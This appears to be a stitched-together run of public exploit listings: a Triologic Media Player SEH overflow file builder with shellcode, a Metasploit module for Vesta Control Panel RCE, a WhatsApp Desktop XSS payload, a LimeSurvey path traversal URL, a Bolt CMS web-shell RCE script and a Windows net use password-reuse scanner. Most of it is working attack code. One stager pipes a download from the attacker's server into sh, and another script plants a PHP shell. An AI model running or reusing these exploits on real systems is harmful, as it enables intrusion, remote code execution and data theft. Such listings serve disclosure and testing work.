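# Exploit Title: Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)
# Date: 2020-04-04
# Author: Felipe Winsnes
# Software Link: http://download.cnet.com/Triologic-Media-Player/3000-2139_4-10691520.html
# Version: 8
# Tested on: Windows 7 (x86)
# Proof of Concept:
# 1.- Run the python script, it will create a new file called "poc.m3l".
# 2.- Open the Application.
# 3.- Some windows warning boxes regarding sound issues may pop up, just click OK.
# 4.- Click on the bottom-right button that displays an arrow and has written "LIST".
# 5.- Select the file "poc.m3l".
# 6.- Profit.
"""Build the Triologic Media Player 8 '.m3l' Unicode SEH overflow file poc.m3l.

The original script mixed a bytes shellcode literal with str padding, which only
works on Python 2 (where both are str); on Python 3 `"C" * 71 + buf` raises
TypeError. Everything here is bytes and the file is written in binary mode, so
the single non-ASCII byte (0xC3, the RET of the alignment stub) is written as-is
instead of being UTF-8 encoded by a text-mode write.
"""

OUTPUT = "poc.m3l"

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/unicode_mixed BufferRegister=EAX EXITFUNC=thread
# Payload size: 512 bytes
SHELLCODE = (
    b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
    b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
    b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
    b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
    b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
    b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
    b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
    b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
    b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
    b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x7a\x48\x61\x72"
    b"\x39\x70\x6b\x50\x49\x70\x73\x30\x54\x49\x47\x75\x70"
    b"\x31\x79\x30\x4f\x74\x72\x6b\x70\x50\x70\x30\x32\x6b"
    b"\x51\x42\x7a\x6c\x74\x4b\x42\x32\x6e\x34\x64\x4b\x64"
    b"\x32\x6b\x78\x6c\x4f\x57\x47\x4d\x7a\x4d\x56\x4e\x51"
    b"\x59\x6f\x46\x4c\x4f\x4c\x71\x51\x61\x6c\x49\x72\x4c"
    b"\x6c\x6d\x50\x36\x61\x46\x6f\x6c\x4d\x4a\x61\x37\x57"
    b"\x69\x52\x7a\x52\x31\x42\x51\x47\x74\x4b\x6e\x72\x4a"
    b"\x70\x44\x4b\x30\x4a\x4d\x6c\x34\x4b\x6e\x6c\x5a\x71"
    b"\x74\x38\x39\x53\x6d\x78\x49\x71\x5a\x31\x70\x51\x62"
    b"\x6b\x70\x59\x6b\x70\x5a\x61\x46\x73\x62\x6b\x4e\x69"
    b"\x4a\x78\x48\x63\x4f\x4a\x61\x39\x72\x6b\x4d\x64\x62"
    b"\x6b\x4a\x61\x36\x76\x4c\x71\x59\x6f\x44\x6c\x45\x71"
    b"\x58\x4f\x6a\x6d\x49\x71\x39\x37\x4d\x68\x39\x50\x73"
    b"\x45\x58\x76\x69\x73\x43\x4d\x4c\x38\x4f\x4b\x31\x6d"
    b"\x4c\x64\x72\x55\x58\x64\x72\x38\x62\x6b\x30\x58\x4f"
    b"\x34\x6a\x61\x7a\x33\x31\x56\x54\x4b\x4c\x4c\x6e\x6b"
    b"\x44\x4b\x50\x58\x4d\x4c\x4a\x61\x38\x53\x72\x6b\x5a"
    b"\x64\x54\x4b\x5a\x61\x58\x50\x33\x59\x61\x34\x6d\x54"
    b"\x6c\x64\x71\x4b\x51\x4b\x6f\x71\x62\x39\x70\x5a\x6f"
    b"\x61\x79\x6f\x47\x70\x61\x4f\x61\x4f\x71\x4a\x44\x4b"
    b"\x4d\x42\x38\x6b\x34\x4d\x4f\x6d\x42\x4a\x49\x71\x62"
    b"\x6d\x42\x65\x45\x62\x69\x70\x39\x70\x59\x70\x50\x50"
    b"\x51\x58\x4d\x61\x74\x4b\x42\x4f\x33\x57\x6b\x4f\x46"
    b"\x75\x37\x4b\x47\x70\x6b\x6d\x6e\x4a\x5a\x6a\x53\x38"
    b"\x46\x46\x52\x75\x65\x6d\x45\x4d\x6b\x4f\x57\x65\x6d"
    b"\x6c\x7a\x66\x43\x4c\x6c\x4a\x35\x30\x59\x6b\x67\x70"
    b"\x50\x75\x6b\x55\x45\x6b\x4d\x77\x5a\x73\x32\x52\x52"
    b"\x4f\x30\x6a\x59\x70\x51\x43\x69\x6f\x38\x55\x52\x43"
    b"\x50\x61\x32\x4c\x61\x53\x6c\x6e\x43\x35\x51\x68\x6f"
    b"\x75\x4d\x30\x41\x41"
)

# nSEH / SEH as written to the file. The player widens the text to UTF-16, so each
# byte below is followed by a 0x00 when it is executed; the 0x71 "padding" bytes
# are there to pair with those inserted nulls into harmless instructions.
NSEH = b"\x71\x41"
SEH = b"\x41\x4a"

# Alignment stub: copy ESP into EAX and move it onto the shellcode, then RET to it.
# (The original comment called the first opcode "push ebx"; 0x54 is PUSH ESP -
# 0x53 would be PUSH EBX.)
ALIGNMENT = (
    b"\x54\x71"      # push esp, padding
    b"\x58\x71"      # pop eax, padding
    b"\x05\x20\x22"  # add eax, 0x22002000 (once the nulls are interleaved)
    b"\x71"          # Padding
    b"\x2D\x19\x22"  # sub eax, 0x22001900
    b"\x71"          # Padding
    b"\x50\x71"      # push eax, padding
    b"\xC3"          # retn
)

OFFSET_TO_NSEH = 536  # characters before the SEH record is overwritten (tested build)


def build_payload():
    """Return the complete poc.m3l content as bytes."""
    return (
        b"A" * OFFSET_TO_NSEH
        + NSEH
        + SEH
        + b"\x41\x71\x41\x71"
        + ALIGNMENT
        + b"C" * 71
        + SHELLCODE
        + b"C" * 2000
    )


def main():
    """Write poc.m3l in the current directory."""
    with open(OUTPUT, "wb") as fh:
        fh.write(build_payload())


if __name__ == "__main__":
    main()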
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Vesta Control Panel authenticated RCE (CVE-2020-10808).
#
# Order of operations (see #exploit): start a plain-HTTP stager server, log in
# to the target's FTP service with the web credentials and upload an empty file
# whose *name* carries the injected command, log in to the web UI, schedule a
# backup, then poll the backup listing until the injected name has been
# evaluated by the backup scripts and the first stage calls back for the
# python/meterpreter second stage.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Vesta Control Panel Authenticated Remote Code Execution",
      'Description'    => %q{
        This module exploits command injection vulnerability in v-list-user-backups bash script file.
        Low privileged authenticated users can execute arbitrary commands under the context of the root user.
        An authenticated attacker with a low privileges can inject a payload in the file name starts with dot.
        During the user backup process, this file name will be evaluated by the v-user-backup bash scripts.
        As result of that backup process, when an attacker try to list existing backups injected payload will be executed.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Mehmet Ince <[email protected]>' # author & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/'],
          ['CVE', '2020-10808']
        ],
      'DefaultOptions' =>
        {
          'SSL' => true,
          'RPORT' => 8083,
          'WfsDelay' => 300,
          'Payload' => 'python/meterpreter/reverse_tcp'
        },
      'Platform'       => ['python'],
      'Arch'           => ARCH_PYTHON,
      'Targets'        => [[ 'Automatic', { }]],
      'Privileged'     => false,
      'DisclosureDate' => "Mar 17 2020",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RPORT(8083),
        OptString.new('USERNAME', [true, 'The username to login as']),
        OptString.new('PASSWORD', [true, 'The password to login with']),
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
      ]
    )
    # The FTP mixin's own credential options are hidden because #payload_implant
    # copies USERNAME/PASSWORD into them before connecting.
    deregister_options('FTPUSER', 'FTPPASS')
  end

  # Web (and, in #payload_implant, FTP) username from the datastore.
  def username
    datastore['USERNAME']
  end

  # Web (and FTP) password from the datastore.
  def password
    datastore['PASSWORD']
  end

  # Fetch the login page for a session cookie and CSRF token, then POST the
  # credentials. Sets @cookie (replaced by the post-login cookies on success)
  # and @csrf_token; fails the module on any unexpected response.
  def login
    #
    # This is very simple login process. Nothing important.
    # We will be using cookie and csrf_token across the module so that we are global variable.
    #
    print_status('Retrieving cookie and csrf token values')
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'login', '/'),
    })

    if res && res.code == 200 && !res.get_cookies.empty?
      @cookie = res.get_cookies
      # NOTE(review): the capture is greedy, so it runs to the last `">` on the
      # same line of markup; fine as long as the token input sits on a line of
      # its own - confirm against the login page if the token comes back wrong.
      @csrf_token = res.body.scan(/<input type="hidden" name="token" value="(.*)">/).flatten[0] || ''
      if @csrf_token.empty?
        fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
      end
    else
      fail_with(Failure::Unknown, 'Something went wrong.')
    end
    print_good('Cookie and CSRF token values successfully retrieved')

    print_status('Authenticating to HTTP Service with given credentials')
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'login', '/'),
      'cookie' => @cookie,
      'vars_post' => {
        'token' => @csrf_token,
        'user' => username,
        'password' => password
      }
    })

    if res && res.code == 302 && !res.get_cookies.empty?
      print_good('Successfully authenticated to the HTTP Service')
      @cookie = res.get_cookies
    else
      fail_with(Failure::Unknown, 'Credentials are not valid.')
    end
  end

  # Return true while the target reports a backup in progress, false once the
  # backup listing (the page that evaluates the injected file name) loads
  # without that message.
  #
  # Note that this calls #trigger_scheduled_backup on every invocation, so each
  # poll of the loop in #exploit asks the target to schedule another backup.
  def is_scheduled_backup_running
    res = trigger_scheduled_backup
    #
    # MORE explaination.
    #
    if res && res.code == 302
      res = trigger_payload
      if res.body.include?('An existing backup is already running. Please wait for that backup to finish.')
        return true
      else
        print_good('It seems scheduled backup is done ..! Triggerring payload <3')
        return false
      end
    else
      fail_with(Failure::Unknown, 'Something went wrong. Did you get your session ?')
    end
    return false
  end

  # GET /list/backup/ with the session cookie. Listing the backups is what runs
  # the injected file name (see the module description). Returns the response
  # on HTTP 200, otherwise fails the module.
  def trigger_payload
    res = send_request_cgi({
      'method' => 'GET',
      'cookie' => @cookie,
      'uri' => normalize_uri(target_uri.path, 'list', 'backup', '/'),
    })

    if res && res.code == 200
      res
    else
      fail_with(Failure::Unknown, 'Something went wrong. Maybe session timed out ?')
    end
  end

  # GET /schedule/backup/ with the session cookie. Success is a 302 back to the
  # backup listing; anything else fails the module. Returns the response.
  def trigger_scheduled_backup
    res = send_request_cgi({
      'method' => 'GET',
      'cookie' => @cookie,
      'uri' => normalize_uri(target_uri.path, 'schedule', 'backup', '/'),
    })

    if res && res.code == 302 && res.headers['Location'] =~ /\/list\/backup\//
      res
    else
      fail_with(Failure::Unknown, 'Something went wrong.')
    end
  end

  # Upload an empty file over FTP whose name is `.a';$(<perl stager>);'` - the
  # single quote closes the string the backup script builds around the name and
  # $(...) runs the stager. The stager is a space-free perl one-liner (${IFS}
  # stands in for spaces, the shell command is hex-packed) that does
  # `curl -sSL <@second_stage_url> | sh`.
  #
  # @second_stage_url must already be set by #start_http_server. Because that
  # server runs without TLS, the second stage travels over plain HTTP and is
  # piped straight into sh on the target: anyone able to tamper with traffic
  # between target and attacker can substitute it.
  #
  # Temporarily rewrites datastore RPORT/SSL for the FTP mixin; only RPORT and
  # SSL are restored afterwards, FTPUSER/FTPPASS keep the copied credentials.
  def payload_implant
    #
    # Our payload will be placed as a file name on FTP service.
    # Payload lenght can't be more then 255 and SPACE can't be used because of the
    # bug in the backend software. Due to these limitations, I used web delivery method.
    #
    # When the initial payload executed. It will execute very short perl command, which is going to fetch
    # actual python meterpreter first stager and execute it.
    #
    final_payload = "curl -sSL #{@second_stage_url} | sh".to_s.unpack("H*").first
    p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"

    # Yet another datastore variable overriding.
    if datastore['SSL']
      ssl_restore = true
      datastore['SSL'] = false
    end
    port_restore = datastore['RPORT']
    datastore['RPORT'] = 21
    datastore['FTPUSER'] = username
    datastore['FTPPASS'] = password

    #
    # Connecting to the FTP service with same creds as web ui.
    # Implanting the very first stage of payload as a empty file.
    #
    if (not connect_login)
      fail_with(Failure::Unknown, 'Unable to authenticate to FTP service')
    end
    print_good('Successfully authenticated to the FTP service')

    res = send_cmd_data(['PUT', ".a';$(#{p});'"], "")
    if res.nil?
      fail_with(Failure::UnexpectedReply, "Failed to upload the payload to FTP server")
    end
    print_good('Successfully uploaded the payload as a file name')
    disconnect

    # Revert datastore variables.
    datastore['RPORT'] = port_restore
    datastore['SSL'] = true if ssl_restore
  end

  # Entry point. The stager server is started first so @second_stage_url exists
  # when #payload_implant builds the file name; the web login happens after the
  # FTP upload. Polls every 30 s (re-scheduling a backup each time, see
  # #is_scheduled_backup_running) until the listing no longer reports a running
  # backup, then stops the stager server.
  def exploit
    start_http_server
    payload_implant
    login
    trigger_scheduled_backup
    print_good('Scheduled backup has ben started. Exploitation may take up to 5 minutes.')
    while is_scheduled_backup_running == true
      print_status('It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...')
      Rex.sleep(30)
    end
    stop_service
  end

  # Serve the second stage to the `curl | sh` stager: a `python -c "..."` line
  # wrapping the encoded payload. The payload text is placed inside double quotes
  # unescaped; presumably the python meterpreter stager contains none - confirm
  # if a different PAYLOAD is selected.
  def on_request_uri(cli, request)
    print_good('First stage is executed ! Sending 2nd stage of the payload')
    second_stage = "python -c \"#{payload.encoded}\""
    send_response(cli, second_stage, {'Content-Type'=>'text/html'})
  end

  # Start the plain-HTTP stager server and record its URL in @second_stage_url.
  # The SSL datastore flag is shared with the HttpClient mixin, so it is cleared
  # while the server is started and the URL computed, then set back.
  def start_http_server
    #
    # HttpClient and HttpServer use same SSL variable :(
    # We don't need a SSL for payload delivery.
    #
    if datastore['SSL']
      ssl_restore = true
      datastore['SSL'] = false
    end
    start_service({'Uri' => {
      'Proc' => Proc.new { |cli, req|
        on_request_uri(cli, req)
      },
      'Path' => resource_uri
    }})
    print_status("Second payload download URI is #{get_uri}")
    # We need that global variable since get_uri keep using SSL from datastore
    # We have to get the URI before restoring the SSL.
    @second_stage_url = get_uri
    datastore['SSL'] = true if ssl_restore
  end
end
  16. # Title: WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting # Date: 2020-01-21 # Exploit Author: Gal Weizman # Vendor Homepage: https://www.whatsapp.com # Software Link: https://web.whatsapp.com/desktop/windows/release/x64/WhatsAppSetup.exe # Software Link: https://web.whatsapp.com/desktop/mac/files/WhatsApp.dmg # Version: 0.3.9308 # Tested On: Mac OS, Windows, iPhone # CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-18426 // step 1: open WhatsApp Web and enter a conversation (Will only work on WhatsApp Web source code as compiled with version 0.3.9308) // step 2: open devtools and search in all files "t=e.id" // step 3: after prettifying, set a breakpoint at the line where "t = e.id" can be found // step 4: paste "https://example.com" in the text box and hit "Enter" // step 5: when the code stops at the breakpoint, paste the following exploit code in the console and hit "Enter" var payload = `(async function() { alert(navigator.userAgent); (async function() { // read "file:///C:/windows/system32/drivers/etc/hosts" content const r = await fetch(atob('ZmlsZTovLy9DOi93aW5kb3dzL3N5c3RlbTMyL2RyaXZlcnMvZXRjL2hvc3Rz')); const t = await r.text(); alert(t); }()) }())`; payload = `javascript:"https://example.com";eval(atob("${btoa(payload)}"))`; e.__x_matchedText = payload; e.__x_body = ` Innocent text ${payload} More Innocent text `; // step 6: press F8 in order for the execution to continue // result: a message should be sent to the victim that once is clicked will execute the payload above // further information: https://github.com/weizman/CVE-2019-18426
  17. # Exploit Title: LimeSurvey 4.1.11 - 'File Manager' Path Traversal # Date: 2020-04-02 # Exploit Author: Matthew Aberegg, Michael Burkey # Vendor Homepage: https://www.limesurvey.org # Version: LimeSurvey 4.1.11+200316 # Tested on: Ubuntu 18.04.4 # CVE : CVE-2020-11455 # Vulnerability Details # Description : A path traversal vulnerability exists within the "File Manager" functionality of LimeSurvey # that allows an attacker to download arbitrary files. The file manager functionality will also # delete the file after it is downloaded (if the web service account has permissions to do so), # allowing an attacker to cause a denial of service by specifying a critical LimeSurvey configuration file. Vulnerable Parameter : "path" # POC https://TARGET/limesurvey/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
  18. # Exploit Title: Bolt CMS 3.7.0 - Authenticated Remote Code Execution # Date: 2020-04-05 # Exploit Author: r3m0t3nu11 # Vendor Homepage: https://bolt.cm/ # Software Link: https://bolt.cm/ # Version: up to date and 6.x # Tested on: Linux # CVE : not-yet-0day #!/usr/bin/python import requests import sys import warnings import re import os from bs4 import BeautifulSoup from colorama import init from termcolor import colored init() #pip install -r requirements.txt print(colored(''' ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌ ▐░░▌▐░░░░░░░░░░░▌ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌ ▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌▐░▌ ▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░░░░░░░░░░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░░░░░░░░░░░▌ ▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▀ ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░ ▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ ▄▄▄▄▄▄▄▄▄█░▌ ▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░▌▐░░░░░░░░░░░▌ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ Pre Auth rce with low credintanl #Zero-way By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue")) if len(sys.argv) != 4: print((len(sys.argv))) print((colored("[~] Usage : ./bolt.py url username password","red"))) exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] request = requests.session() print((colored("[+] Retrieving CSRF token to submit the login form","green"))) page = request.get(url+"/bolt/login") html_content = page.text soup = BeautifulSoup(html_content, 'html.parser') token = soup.findAll('input')[2].get("value") login_info = { "user_login[username]": username, "user_login[password]": password, "user_login[login]": "", "user_login[_token]": token } login_request = request.post(url+"/bolt/login", login_info) print((colored("[+] Login token is : 
{0}","green")).format(token)) aaa = request.get(url+"/bolt/profile") soup0 = BeautifulSoup(aaa.content, 'html.parser') token0 = soup0.findAll('input')[6].get("value") data_profile = { "user_profile[password][first]":"password", "user_profile[password][second]":"password", "user_profile[email]":"[email protected]", "user_profile[displayname]":"<?php system($_GET['test']);?>", "user_profile[save]":"", "user_profile[_token]":token0 } profile = request.post(url+'/bolt/profile',data_profile) cache_csrf = request.get(url+"/bolt/overview/showcases") soup1 = BeautifulSoup(cache_csrf.text, 'html.parser') csrf = soup1.findAll('div')[12].get("data-bolt_csrf_token") asyncc = request.get(url+"/async/browse/cache/.sessions?multiselect=true") soup2 = BeautifulSoup(asyncc.text, 'html.parser') tables = soup2.find_all('span', class_ = 'entry disabled') print((colored("[+] SESSION INJECTION ","green"))) for all_tables in tables: f= open("session.txt","a+") f.write(all_tables.text+"\n") f.close() num_lines = sum(1 for line in open('session.txt')) renamePostData = { "namespace": "root", "parent": "/app/cache/.sessions", "oldname": all_tables.text, "newname": "../../../public/files/test{}.php".format(num_lines), "token": csrf } rename = request.post(url+"/async/folder/rename", renamePostData) try: url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines) rev = requests.get(url1).text r1 = re.findall('php',rev) r2 = r1[0] if r2 == "php" : fileINJ = "test{}".format(num_lines) print((colored("[+] FOUND : "+fileINJ,"green"))) except IndexError: print((colored("[-] Not found.","red"))) new_name = 0 while new_name != 'quit': inputs = input(colored("Enter OS command , for exit 'quit' : ","green","on_red")) if inputs == "quit" : exit() else: a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs)) aa = a.text r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa) print((r11)[0])
  19. # Title: Microsoft NET USE win10 - Insufficient Authentication Logic # Date: 2020-04-04 # Author: hyp3rlinx # Vendor: www.microsoft.com # CVE: N/A [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows "net use" Command Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections. [Vulnerability Type] Insufficient Password Prompt [CVE Reference] N/A [Security Issue] The Windows "net use" network logon type-3 command does not prompt for authentication when the built-in Administrator account is enabled and both remote and originating systems suffer from password reuse. This also works as a "standard" user, but unfortunately we do not gain high integrity privileges. However, it opens the door and increases the attack surface if the box we laterally move to has other vulnerabilities present. In contrast, authenticating using the "unc path" "\\x.x.x.x\c$" using an explorer type logon does prompt for credentials as expected. The authentication mechanism between the two network logon methods is inconsistent and in my opinion leaves an authentication loophole invitation. Moreover, since this targets the built-in Administrator account, one would think there would be more or equal security measures in place, not less. Requirements: 1) Remote system built-in Administrator account is enabled 2) Origination system user's account password and the remote system Administrator password match (reuse). Typically, to gain Admin privileges on remote logon you may have to create and enable "LocalAccountTokenFilterPolicy", but NOT in this case. 
  Again, the "LocalAccountTokenFilterPolicy" registry setting does NOT need to exist, is NOT enabled, and has no bearing on the issue. However, if "FilterAdministratorToken" is enabled in the registry on the remote system then the above loophole scenario fails. Interestingly, the "FilterAdministratorToken" setting does not seem to exist by default in the Windows registry. Therefore, if an attacker pops a box they can check "MountPoints2" registry values, usually used by forensic analysts to find previous network connections, and try them; if there's password reuse (likely) BOOM automagic logon. This vuln occurs due to inconsistent password dialog prompting depending on whether the "net use" logon method is used. When testing, make sure to log out then log back in after changing passwords so the environment is clean. e.g. 1) Passwords for both systems are different and remote built-in Administrator account active: C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator Enter the password for 'Administrator' to connect to '192.168.x.x': System error 5 has occurred. Access is denied. 2) Passwords for both origination system and remote match: C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator The command completed successfully. By the way, as a side note, DCERPC calls work as well if both systems happen to have the same password. c:\>getmac /s x.x.x.x /U Administrator MSRC in their response pointed out that "No login prompt on remote connection if both Administrator password are the same." Ok, but why does "net use" not follow the same pattern as doing a UNC-Path type of logon, where we get the expected cred dialog box? Expected result: Consistent password dialog box, no matter if passwords match or not. Actual Result: No prompt for a password if both systems' passwords are the same. Tested successfully on fully patched Windows 10 using a VM, also across LAN to a non-domain connected PC. 
[Exploit/POC] import os,re,time,signal,sys from subprocess import * from multiprocessing import Process #By John Page (aka hyp3rlinx) #Apparition Security #twitter.com/hyp3rlinx #----------------------------------- #When a remote systems built-in Administrator account is enabled and both the remote and the target system #passwords match (password reuse) theres no prompt for credentials and we get logged in automagically. # #MountPoints2 and Terminal server client hints in the Windows registry can help us. #Typically, MountPoints2 is used by Forensic analysts to help determine where an attacker laterally moved to previously. #REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##" (we want network logons) #MountPoints2 key entries are stored like '##10.2.1.40#c$' #----------------------------------------------------------- BANNER=""" _ ______________ ___ ____ __ _______ ______ / | / / ____/_ __/ / | / __ )/ / / / ___// ____/ / |/ / __/ / / / /| | / __ / / / /\__ \/ __/ / /| / /___ / / / ___ |/ /_/ / /_/ /___/ / /___ /_/ |_/_____/ /_/ /_/ |_/_____/\____//____/_____/ By Hyp3rlinx ApparitionSec """ DRIVE="X" FINDME="The command completed successfully." REG_MOUNT2='REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##"' REG_RDPUSERS="REG Query \"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers\""+" /s" VULN_FOUND=set() DELAY=2 #Any lower and we may get inaccurate results. rdp_server_lst=[] #Return prior network logons to remote systems. def mountpoints2(): mntpoint2_connections=[] try: p = Popen(REG_MOUNT2, stdout=PIPE, stderr=PIPE, shell=True) tmp = p.stdout.readlines() except Exception as e: print("[!] 
"+str(e)) return False for x in tmp: idx = x.find("##") clean = x[idx:] idx2 = clean.rfind("#") ip = clean[2:idx2] ip = re.sub(r"#.*[A-Z,a-z]","",ip) if ip not in mntpoint2_connections: mntpoint2_connections.append(ip) mntpoint2_connections = list(filter(None, mntpoint2_connections)) p.kill() return mntpoint2_connections #Terminal server client stores remote server connections. def rdp_svrs(): global rdp_server_lst try: p = Popen(REG_RDPUSERS, stdout=PIPE, stderr=PIPE, shell=True) tmp = p.stdout.readlines() for key in tmp: if key.find("Servers")!=-1: pos = key.rfind("\\") srv = key[pos + 1:].replace("\r\n","").strip() rdp_server_lst.append(srv) p.kill() except Exception as e: print("[!] "+str(e)) return False return True #Disconnect def del_vuln_connection(ip): try: print("[!] Disconnecting vuln network logon connection.\n") call(r"net use "+DRIVE+":"+" /del") except Exception as e: print("[!] "+str(e)) #Check connection def chk_connection(ip): print("[+] Testing: "+ip) sys.stdout.flush() cmd = Popen(['ping.exe', ip, "-n", "1"], stderr=PIPE, stdout=PIPE, shell=True) stderr, stdout = cmd.communicate() if "Reply from" in stderr and "Destination host unreachable" not in stderr: print("[*] Target up!") return True else: print("[!] 
Target unreachable :(") return False #Test vuln def Test_Password_Reuse(ip): print("[+] Testing "+ip + " the builtin Administrator account.\n") sys.stdout.flush() try: p = Popen("net use X: \\\\"+ip+"\\c$ /user:Administrator", stdout=PIPE, stderr=PIPE, shell=True) err = p.stderr.readlines() if err: e = str(err) if e.find("error 53")!=-1: print("[*] Network path not found\n") return elif e.find("error 1219")!=-1: print("[*] Target connections to a server or shared resource by the same user, using more than one user name are disallowed.\n") return elif e.find("error 85")!=-1: print("[*] The local device name is already in use.\n") return else: print(e+"\n") tmp = p.stdout.read() if FINDME in tmp: print("[*] Password reuse for the built-in Administrator found!") print("[+] Connected to target: "+ ip) VULN_FOUND.add(ip+":Administrator") del_vuln_connection(ip) p.kill() except Exception as e: print("[!] "+str(e)) #Authenticate def auth(ip): action_process = Process(target=Test_Password_Reuse, args=(ip,)) action_process.start() action_process.join(timeout=5) action_process.terminate() if __name__ == "__main__": print(BANNER) print("[+] Windows 'net use' Network Logon Type-3") print("[+] Insufficient Password Prompt") print("[+] By hyp3rlinx\n") time.sleep(3) print("[+] Deleting any existing network logons to start clean.") #Make sure no exist sessions already exist. call(r"net use * /del /y") sys.stdout.flush() time.sleep(1) #Grab previous connections from MountPoints2 if any. rdp_svrs() svrlst=mountpoints2() if svrlst: svrlst + rdp_server_lst else: svrlst = rdp_server_lst if not svrlst: print("[*] No MountPoints2 artifacts found, enter an IP.") sys.stdout.flush() ip=raw_input("[+] Target IP> ") if chk_connection(ip): auth(ip) else: #We have MountPoints2 or RDP Server list IP we can try. 
for ip in svrlst: if chk_connection(ip): auth(ip) time.sleep(DELAY) if len(VULN_FOUND) != 0: print("[*] Located the following vulnerable systems:") sys.stdout.flush() for v in VULN_FOUND: print("[+] "+v) else: print("[+] All previous attempts failed, enter an IP and give it a shot!.") sys.stdout.flush() ip=raw_input("[+] Target IP> ") if chk_connection(ip): auth(ip) [POC Video URL] https://www.youtube.com/watch?v=Je93Neb0k8g [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: February 28, 2020 MSRC "behavior you are reporting is by design" : March 30, 2020 April 5, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). 